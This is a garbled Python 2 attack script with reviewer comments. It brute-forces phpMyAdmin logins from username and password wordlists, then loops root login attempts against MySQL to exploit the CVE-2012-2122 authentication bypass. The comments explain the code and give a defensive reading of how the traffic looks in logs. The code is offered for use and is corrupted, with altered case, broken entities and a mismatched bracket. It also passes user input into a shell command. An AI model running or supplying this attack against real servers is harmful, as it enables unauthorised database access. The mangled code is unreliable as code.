phpMyAdmin login brute-force script, plus an exploit for the CVE-2012-2122 MySQL authentication bypass vulnerability.
# NOTE(review): this listing was collapsed onto one line and garbled in
# extraction: identifier case is altered, spaces are inserted inside string
# literals, `&L T;` is a broken HTML entity for `<`, and one call closes with
# `]`. It is not runnable as shown and is kept verbatim below. The APIs used
# (urllib2, cookielib, raw_input, print statements) are Python 2.
#
# What the visible code does:
# - Crack(url, username, password): builds a cookie-aware urllib2 opener,
#   POSTs the pma_username / pma_password form fields to url + "/index.php"
#   with a fixed browser User-Agent, and reads the response body. It returns
#   (username, password) when the body contains 'Database Server' and does
#   not contain the login form marker; otherwise it returns 0.
# - Mysqlauthenticationbypasscheck(host, port): loops up to 300 times, each
#   time starting the mysql command-line client as root with what appears to
#   be a fixed password and waiting for it to exit. The repetition matches
#   the probabilistic nature of CVE-2012-2122, where a wrong password is
#   occasionally accepted by an unpatched server.
# - __main__: needs at least three arguments (URL, username file, password
#   file), tries every username/password pair through Crack, exits on the
#   first success, and otherwise offers the MySQL check after prompting for
#   host and port.
#
# NOTE(review): the mysql command line is assembled with % formatting from
# raw_input() values and run with shell=True, so shell metacharacters in the
# host or port would be interpreted by the shell.
#
# Defensive reading: in web server logs this traffic looks like a burst of
# POSTs to /index.php carrying pma_username from a single client with one
# constant User-Agent; on the database side it is a rapid run of failed root
# logins from one source. Login throttling or lockout, restricting who can
# reach phpMyAdmin and the MySQL port, and running a vendor-fixed MySQL or
# MariaDB release address both halves.
#!/usr/bin/env pythonimport urllib Import urllib2 import cookielib import sysimport subprocessdef Crack (Url,username, Password): opener = Urllib2.build_opener (urllib2. Httpcookieprocessor (Cookielib. Lwpcookiejar ())) headers = {' user-agent ': ' mozilla/5.0 (Windows NT 6.1; WOW64) '}params = Urllib.urlencode ({' Pma_username ': username, ' Pma_password ': password}) request = Urllib2. Request (url+ "/index.php", params,headers) response = Opener.open (Request) A=response.read () If A.find (' Database Server ')!=-1 and A.find (' Name= "Login_form" ') ==-1:return Username,passwordreturn 0def Mysqlauthenticationbypasscheck (host,port): I=0while i<300:i=i+1subprocess. Popen ("MySQL--host=%s-p%s-uroot-piswin"% (Host,port), shell=true). Wait () if __name__ = = ' __main__ ': If Len (SYS.ARGV) &L T;4:print "#author: Iswin\n#useage python pma.py http://www.jb51.net/phpmyadmin/username.txt password.txt" Sys.exit () print "Bruting,pleas wait ..." for name in open (Sys.argv[2], "R"): for PASSW in Open (Sys.argv[3], "R"): State=crack (sys.argv[1],NAME,PASSW] If State!=0:print "\nbrute successful" print "UserName:" +state[0]+ "PassWord:" +state[1]sys.exit () Print "Sorry,brute failed...,try to use Mysqlauthenticationbypasscheck" choice=raw_input (' warning:this function needs MySQL environment.\ny:try to mysqlauthenticationbypasscheck\nothers:exit\n ') if choice== ' y ' or choice== ' y ': host=raw_ Input (' Host: ') port=raw_input (' Port: ') Mysqlauthenticationbypasscheck (Host,port)